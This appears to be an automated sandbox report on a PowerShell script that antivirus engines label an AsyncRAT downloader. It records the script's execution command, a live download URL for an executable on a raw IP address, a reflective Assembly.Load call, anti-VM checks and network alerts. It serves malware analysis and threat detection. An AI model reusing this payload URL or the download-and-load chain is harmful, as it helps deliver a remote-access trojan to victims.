Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 28, 2025, 10:45 a.m.	April 28, 2025, 10:48 a.m.

Size	712.0B
Type	ASCII text, with CRLF line terminators
MD5	`61d5db12ed0611000c59d5fd7fe884c2`
SHA256	`5c43a6d132376244c80efb953ff1d5563cd7b06a531b3e8e5f4678ec765c70a6`
CRC32	`675C1B52`
ssdeep	`12:AUFCS5/+daZ7IaYS51gKI7M3WVbgd3pjqI5J0gdJQg+QrgxnIAg:fFCS5/vZkax51w7M3Wx2xj5J02Jx+8gA`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\pik.ps1
3012

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
88.214.48.26	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49163 -> 88.214.48.26:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.102:49163 -> 88.214.48.26:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 88.214.48.26:80 -> 192.168.56.102:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 88.214.48.26:80 -> 192.168.56.102:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 88.214.48.26:80 -> 192.168.56.102:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW April 28, 2025, 10:45 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (8 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 28, 2025, 10:45 a.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000023	1	1
WriteConsoleW April 28, 2025, 10:45 a.m.	buffer: '501664 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultu console_handle: 0x0000002f	1	1
WriteConsoleW April 28, 2025, 10:45 a.m.	buffer: re=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An att console_handle: 0x0000003b	1	1
WriteConsoleW April 28, 2025, 10:45 a.m.	buffer: empt was made to load a program with an incorrect format." console_handle: 0x00000047	1	1
WriteConsoleW April 28, 2025, 10:45 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\pik.ps1:19 char:46 console_handle: 0x00000053	1	1
WriteConsoleW April 28, 2025, 10:45 a.m.	buffer: + return [System.Reflection.Assembly]::Load <<<< ($uO) console_handle: 0x0000005f	1	1
WriteConsoleW April 28, 2025, 10:45 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000006b	1	1
WriteConsoleW April 28, 2025, 10:45 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000077	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey April 28, 2025, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05511228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05511228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05511228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05511228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05511228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05511228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 28, 2025, 10:45 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://88.214.48.26/tpnl98/ret.exe

Performs some HTTP requests (1 event)

request

GET http://88.214.48.26/tpnl98/ret.exe

Allocates read-write-execute memory (usually to unpack itself) (27 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02609000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x057d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x057d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x057e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02952000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02639000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05448000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05449000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x086b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x086b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x086b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x086b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x086b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x057d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x057d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x057d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:45 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x057d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 28, 2025, 10:45 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

*(*(*(*( *( *(*(*( *(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*( *(!*("*(#*($*(%*(&*('*((*()*(**(+*(,*(-*(.*(/*(0*(1*(2*(3*(4*(5*(6*(7*(8*(9*(:*(;*(<*(=*(>*(?*(@*(A*(B*(C*(D*(E*(F*(G*(H*(I*(J*(K*(L*(M*(N*(O*(P*(Q*(R*(S*(T*(U*(V*(W*(X*(Y*(Z*([*(\*(]*(^*(_*(`*(a*(b*(c*(d*(e*(f*(g*(h*(i*(j*(k*(l*(m*(n*(o*(p*(q*(r*(s*(t*(u*(v*(w*(x*(y*(z*({*(|*(}*(~*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*( *(¡*(¢*(£*(¤*(¥*(¦*(§*(¨*(©*(ª*(«*(¬*(*(®*(¯*(°*(±*(²*(³*(´*(µ*(¶*(·*(¸*(¹*(º*(»*(¼*(½*(¾*(¿*(À*(Á*(Â*(Ã*(Ä*(Å*(Æ*(Ç*(È*(É*(Ê*(Ë*(Ì*(Í*(Î*(Ï*(Ð*(Ñ*(Ò*(Ó*(Ô*(Õ*(Ö*(×*(Ø*(Ù*(Ú*(Û*(Ü*(Ý*(Þ*(ß*(à*(á*(â*(ã*(ä*(å*(æ*(ç*(è*(é*(ê*(ë*(ì*(í*(î*(ï*(ð*(ñ*(ò*(ó*(ô*(õ*(ö*(÷*(ø*(ù*(ú*(û*(ü*(ý*(þ*(ÿ*(*(*(*(*(*(*(*(*(*( *( *(*(*( *(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*( *(!*("*(#*($*(%*(&*('*((*()*(**(+*(,*(-*(.*(/*(0*(1*(2*(3*(4*(5*(6*(7*(8*(9*(:*(;*(<*(=*(>*(?*(@*(A*(B*(C*(D*(E*(F*(G*(H*(I*(J*(K*(L*(M*(N*(O*(P*(Q*(R*(S*(T*(U*(V*(W*(X*(Y*(Z*([*(\*(]*(^*(_*(`*(a*(b*(c*(d*(e*(f*(g*(h*(i*(j*(k*(l*(m*(n*(o*(p*(q*(r*(s*(t*(u*(v*(w*(x*(y*(z*({*(|*(}*(~*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*( *(¡*(¢*(£*(¤*(¥*(¦*(§*(¨*(©*(ª*(«*(¬*(*(®*(¯*(°*(±*(²*(³*(´*(µ*(¶*(·

Poweshell is sending data to a remote host (1 event)

Data sent

GET /tpnl98/ret.exe HTTP/1.1 Host: 88.214.48.26 Connection: Keep-Alive

Communicates with host for which no DNS query was performed (1 event)

host

88.214.48.26

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send April 28, 2025, 10:45 a.m.	buffer: GET /tpnl98/ret.exe HTTP/1.1 Host: 88.214.48.26 Connection: Keep-Alive socket: 1584 sent: 76	1	76	0

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

CTX	powershell.downloader.asyncrat
ALYac	Trojan.GenericKD.76282900
VIPRE	Trojan.GenericKD.76282900
Arcabit	Trojan.Generic.D48BFC14
Symantec	Trojan.Gen.NPE
ESET-NOD32	PowerShell/TrojanDownloader.Agent.LYW
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan-Downloader.PowerShell.Agent.gen
BitDefender	Trojan.GenericKD.76282900
MicroWorld-eScan	Trojan.GenericKD.76282900
Rising	Downloader.Agent/PS!8.1250D (TOPIS:E0:I8VBzmz4OfT)
Emsisoft	Trojan.GenericKD.76282900 (B)
Google	Detected
Antiy-AVL	Trojan[Downloader]/PowerShell.AsyncRAT
Microsoft	TrojanDownloader:PowerShell/AsyncRAT.YTS!MTB
GData	Trojan.GenericKD.76282900
Varist	ABDownloader.FAIV
Ikarus	Trojan-Downloader.PowerShell.Agent
Tencent	Win32.Trojan-Downloader.Downloader.Hajl
huorong	TrojanDownloader/PS.Agent.cn
AVG	Script:SNH-gen [Drp]

pik.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All